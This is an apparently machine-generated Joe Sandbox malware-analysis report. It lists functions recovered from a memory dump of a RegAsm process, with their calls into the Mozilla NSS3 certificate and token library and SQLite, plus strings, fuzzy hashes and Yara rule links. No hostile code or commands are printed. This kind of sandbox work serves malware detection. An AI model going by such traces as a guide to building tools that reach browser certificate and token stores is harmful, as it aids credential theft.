PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C177F4A,00000000,?,00000000,00000000), ref: 6C18DD36
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C177F4A,00000000,?,00000000,00000000), ref: 6C18DE2D
memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C177F4A,00000000,?,00000000,00000000), ref: 6C18DE43
PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C177F4A,00000000,?,00000000,00000000), ref: 6C18DE76
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C177F4A,00000000,?,00000000,00000000), ref: 6C18DF32
memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C177F4A,00000000,?,00000000,00000000), ref: 6C18DF5F
PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C177F4A,00000000,?,00000000,00000000), ref: 6C18DF78
PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C177F4A,00000000,?,00000000,00000000), ref: 6C18DFAA

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Alloc_Util$memcpy$Valuemalloc
String ID:
API String ID: 1886645929-0
Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction ID: 53772a89ff07ef70f1574dbdacd9a3e14f1fb23ef57ac7dec622db944b876a16
Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction Fuzzy Hash: C981A47060F7038BFF146A19C89075972A2DB71348F20843BE919CAFD5E778C884CE62

Function 6C163C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C163C76
CERT_DestroyCertificate.NSS3(00000000), ref: 6C163C94

Part of subcall function 6C1595B0: TlsGetValue.KERNEL32(00000000,?,6C1700D2,00000000), ref: 6C1595D2
Part of subcall function 6C1595B0: EnterCriticalSection.KERNEL32(?,?,?,6C1700D2,00000000), ref: 6C1595E7
Part of subcall function 6C1595B0: PR_Unlock.NSS3(?,?,?,?,6C1700D2,00000000), ref: 6C159605

PORT_NewArena_Util.NSS3(00000800), ref: 6C163CB2
PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C163CCA
memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C163CE1

Part of subcall function 6C163090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C17AE42), ref: 6C1630AA
Part of subcall function 6C163090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C1630C7
Part of subcall function 6C163090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C1630E5
Part of subcall function 6C163090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C163116
Part of subcall function 6C163090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C16312B
Part of subcall function 6C163090: PK11_DestroyObject.NSS3(?,?), ref: 6C163154
Part of subcall function 6C163090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C16317E

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
String ID:
API String ID: 3167935723-0
Opcode ID: 009679304beb2b55932c07d25cb75f3228580295d39bd4b710318dc6a8932c73
Instruction ID: 7e58be25008edb0bd8803de2ca6acf40815da52e28ddf1250163618320157386
Opcode Fuzzy Hash: 009679304beb2b55932c07d25cb75f3228580295d39bd4b710318dc6a8932c73
Instruction Fuzzy Hash: 6861F8B5A00200BBEB115E66DC41FA776B9EF14748F884428FE06DAE52F731D829C7B1

Function 6C1A3D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 6C1A3440: PK11_GetAllTokens.NSS3 ref: 6C1A3481
Part of subcall function 6C1A3440: PR_SetError.NSS3(00000000,00000000), ref: 6C1A34A3
Part of subcall function 6C1A3440: TlsGetValue.KERNEL32 ref: 6C1A352E
Part of subcall function 6C1A3440: EnterCriticalSection.KERNEL32(?), ref: 6C1A3542
Part of subcall function 6C1A3440: PR_Unlock.NSS3(?), ref: 6C1A355B

TlsGetValue.KERNEL32 ref: 6C1A3D8B
EnterCriticalSection.KERNEL32(?), ref: 6C1A3D9F
PR_Unlock.NSS3(?), ref: 6C1A3DCA
PR_SetError.NSS3(00000000,00000000), ref: 6C1A3DE2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C1A3E4F

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

TlsGetValue.KERNEL32 ref: 6C1A3E97
EnterCriticalSection.KERNEL32(?), ref: 6C1A3EAB
PR_Unlock.NSS3(?), ref: 6C1A3ED6
PR_SetError.NSS3(00000000,00000000), ref: 6C1A3EEE

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
String ID:
API String ID: 2554137219-0
Opcode ID: dca9f2233cb8da70c70ee1a626f8184c44a0b0956a7ae329bb736eed28f27083
Instruction ID: 0c49f6d726766bf2861516af96dd768ec59f35464c30cf9ce04f79d5338088bd
Opcode Fuzzy Hash: dca9f2233cb8da70c70ee1a626f8184c44a0b0956a7ae329bb736eed28f27083
Instruction Fuzzy Hash: 825166BAA002009FDB01AFA9DC48B6B73B0EF15318F850528DE1847B52EB31E857CBD1

Function 6C152C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(8420A818), ref: 6C152C5D

Part of subcall function 6C1B0D30: calloc.MOZGLUE ref: 6C1B0D50
Part of subcall function 6C1B0D30: TlsGetValue.KERNEL32 ref: 6C1B0D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C152C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C152CE0

Part of subcall function 6C152E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C152CDA,?,00000000), ref: 6C152E1E
Part of subcall function 6C152E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C152E33
Part of subcall function 6C152E00: TlsGetValue.KERNEL32 ref: 6C152E4E
Part of subcall function 6C152E00: EnterCriticalSection.KERNEL32(?), ref: 6C152E5E
Part of subcall function 6C152E00: PL_HashTableLookup.NSS3(?), ref: 6C152E71
Part of subcall function 6C152E00: PL_HashTableRemove.NSS3(?), ref: 6C152E84
Part of subcall function 6C152E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C152E96
Part of subcall function 6C152E00: PR_Unlock.NSS3 ref: 6C152EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C152D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C152D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C152D3F
free.MOZGLUE(00000000), ref: 6C152D73
CERT_DestroyCertificate.NSS3(?), ref: 6C152DB8
free.MOZGLUE ref: 6C152DC8

Part of subcall function 6C153E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C153EC2
Part of subcall function 6C153E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C153ED6
Part of subcall function 6C153E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C153EEE
Part of subcall function 6C153E60: PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0), ref: 6C153F02
Part of subcall function 6C153E60: PL_FreeArenaPool.NSS3 ref: 6C153F14
Part of subcall function 6C153E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C153F27

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: e540957f01033a2e575c9ed4d5aec35067ac407af1dcbaa5e0062c1717846652
Instruction ID: 8396d3fb873a71c2603e82213581c9509206d32bca016be156dcd0c1f1435f16
Opcode Fuzzy Hash: e540957f01033a2e575c9ed4d5aec35067ac407af1dcbaa5e0062c1717846652
Instruction Fuzzy Hash: 67510EB2A042159FEB01DF68DC88B6B77E5EFA4348F540428EC6983651E731E825CB92

Function 6C157CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C1540D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C153F7F,?,00000055,?,?,6C151666,?,?), ref: 6C1540D9
Part of subcall function 6C1540D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C151666,?,?), ref: 6C1540FC
Part of subcall function 6C1540D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C151666,?,?), ref: 6C154138

PR_GetCurrentThread.NSS3 ref: 6C157CFD

Part of subcall function 6C219BF0: TlsGetValue.KERNEL32(?,?,?,6C260A75), ref: 6C219C07

SECITEM_ItemsAreEqual_Util.NSS3(?,6C279030), ref: 6C157D1B

Part of subcall function 6C1AFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C151A3E,00000048,00000054), ref: 6C1AFD56

SECITEM_ItemsAreEqual_Util.NSS3(?,6C279048), ref: 6C157D2F
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C157D50
PR_GetCurrentThread.NSS3 ref: 6C157D61
PORT_ArenaMark_Util.NSS3(?), ref: 6C157D7D
free.MOZGLUE(?), ref: 6C157D9C
CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C157DB8
PR_SetError.NSS3(FFFFE023,00000000), ref: 6C157E19

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
String ID:
API String ID: 70581797-0
Opcode ID: 4c10b6910e5f94cd55435ec033cd3e5b2414186ac41bea75bc02d3cd2c42a569
Instruction ID: c308a8320ba59e581d35a27464f9befc17905466372a25cbffb495e827eae095
Opcode Fuzzy Hash: 4c10b6910e5f94cd55435ec033cd3e5b2414186ac41bea75bc02d3cd2c42a569
Instruction Fuzzy Hash: 244115B2A1011A9BDB009E699C46BAF33E4AF5035CF454026EC29A7B50E730E939C7E1

Function 6C1B3CA0 Relevance: 13.6, APIs: 9, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6C1B38BD), ref: 6C1B3CBE
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6C1B38BD), ref: 6C1B3CD1

Part of subcall function 6C1B0BE0: malloc.MOZGLUE(6C1A8D2D,?,00000000,?), ref: 6C1B0BF8
Part of subcall function 6C1B0BE0: TlsGetValue.KERNEL32(6C1A8D2D,?,00000000,?), ref: 6C1B0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6C1B38BD), ref: 6C1B3CF0
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C28B369,000000FF,00000000,00000000,?,000000FF,00000000,00000000,6C1B38BD), ref: 6C1B3D0B
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,6C1B38BD), ref: 6C1B3D1A
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C28B369,000000FF,00000000,00000000,00000000,6C1B38BD), ref: 6C1B3D38
_wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000), ref: 6C1B3D47
free.MOZGLUE(00000000), ref: 6C1B3D62
free.MOZGLUE(000000FF,?,000000FF,00000000,00000000,6C1B38BD), ref: 6C1B3D6F

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_Utilfree$Value_wfopenmalloc
String ID:
API String ID: 2345246809-0
Opcode ID: dfe8d9d97429980ce4d9569526da3e723236522f816c9f583a71f3e778933784
Instruction ID: 2bd99c1ef5ee9417e2a855272930a05b78aa5028bd08420407edee8150ad8867
Opcode Fuzzy Hash: dfe8d9d97429980ce4d9569526da3e723236522f816c9f583a71f3e778933784
Instruction Fuzzy Hash: 4421D4B970121277FB2066BA5C0DF7B39ACDB82AA4B540635F939E76C0DE71C811C6B1

Function 6C1B4DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C1B536F,00000022,?,?,00000000,?), ref: 6C1B4E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C1B4F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C1B4F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C1B4FAE
free.MOZGLUE(?), ref: 6C1B4FC8

Strings

%s=%c%s%c, xrefs: 6C1B4FA9
%s=%s, xrefs: 6C1B4F89

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s
API String ID: 2709355791-2032576422
Opcode ID: bc7b0d10c2e973d7ba40173560758188d0d699076e9fe184318da4b11e74b491
Instruction ID: 1090207b971cbefa5c130ea334fbac0017ffd0b87afcd9f8a18374fa23f9cbad
Opcode Fuzzy Hash: bc7b0d10c2e973d7ba40173560758188d0d699076e9fe184318da4b11e74b491
Instruction Fuzzy Hash: B0515671A0515A8BEB01CA6DC4907FFBBF59F52308F29C169F894B7A41D33D88058FA1

Function 6C0F7D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0F7E27
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0F7E67
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C0F7EED
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C0F7F2E

Strings

%s at line %d of [%.10s], xrefs: 6C0F7EE7, 6C0F7F28
database corruption, xrefs: 6C0F7EE2, 6C0F7F23
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C0F7ED8, 6C0F7F08, 6C0F7F19

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: d2e8f3872f897eebbcac48b13d24cbc3be3c5d6eb5a84a630cddc2689bbad639
Instruction ID: 62d08403f004e5cd49ba6d73b6fa63a7ef4d3529bdd39a20173e0b6780110866
Opcode Fuzzy Hash: d2e8f3872f897eebbcac48b13d24cbc3be3c5d6eb5a84a630cddc2689bbad639
Instruction Fuzzy Hash: 5261C770A042059FDB05CF29C890B6A77F2BF49318F1445A9EC295FB51D730EC96CBA2

Function 6C0DFCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C0DFD7A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0DFD94
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C0DFE3C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0DFE83

Part of subcall function 6C0DFEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C0DFEFA
Part of subcall function 6C0DFEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C0DFF3B

Strings

%s at line %d of [%.10s], xrefs: 6C0DFD73, 6C0DFE35
database corruption, xrefs: 6C0DFD6E, 6C0DFE30
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C0DFD64, 6C0DFE26

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1169254434-598938438
Opcode ID: 8422fb95b5547f16e14fe423cf2796fca578482273ebeca5fa9ad7eb6ef04bfd
Instruction ID: 1b944f798446a4a4dd7ee1cad9f2e4344eccbecaab3c89b839ca0572fb2867ed
Opcode Fuzzy Hash: 8422fb95b5547f16e14fe423cf2796fca578482273ebeca5fa9ad7eb6ef04bfd
Instruction Fuzzy Hash: 43515071A003099FDF04CFA9D890BAEB7F5AF48308F558069E905AB756E731ED54CBA0

Function 6C222F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C222FFD
sqlite3_initialize.NSS3 ref: 6C223007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C223032
sqlite3_mprintf.NSS3(6C28AAF9,?), ref: 6C223073
sqlite3_free.NSS3(?), ref: 6C2230B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C2230C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C2230BB

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: 09433a7776d7661c3ecae8d17a573eae38439192e133ea8c7b8fb6b7477045ef
Instruction ID: c26a9998d910fb0472bf214dc434a3fc068963f0478e72b40b72db47a56e84d1
Opcode Fuzzy Hash: 09433a7776d7661c3ecae8d17a573eae38439192e133ea8c7b8fb6b7477045ef
Instruction Fuzzy Hash: C841B37160060AAFDB10CF25D840A46B7E9FF44369F148629FC1987B40EB35FA55CBE0

Function 6C168CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C17124D,00000001), ref: 6C168D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C17124D,00000001), ref: 6C168D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C17124D,00000001), ref: 6C168D73
PR_Unlock.NSS3(?,?,?,?,?,6C17124D,00000001), ref: 6C168D8C

Part of subcall function 6C1FDD70: TlsGetValue.KERNEL32 ref: 6C1FDD8C
Part of subcall function 6C1FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C1FDDB4

PR_Unlock.NSS3(?,?,?,?,?,6C17124D,00000001), ref: 6C168DBA

Strings

KRAM, xrefs: 6C168CF9
KRAM, xrefs: 6C168D3E

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: f79055c82dda06c72a7425ee94748c37abd4805a07cd04604e73bf0e9182f28a
Instruction ID: 794bc56cd9c05f3c57970c175ec40555a21c4d56169c781dec992e35d629e67c
Opcode Fuzzy Hash: f79055c82dda06c72a7425ee94748c37abd4805a07cd04604e73bf0e9182f28a
Instruction Fuzzy Hash: 5C2191B1A046018FDB00EF7AC48466EB7F0FF56318F16896ADD9887B01D734D891CBA1

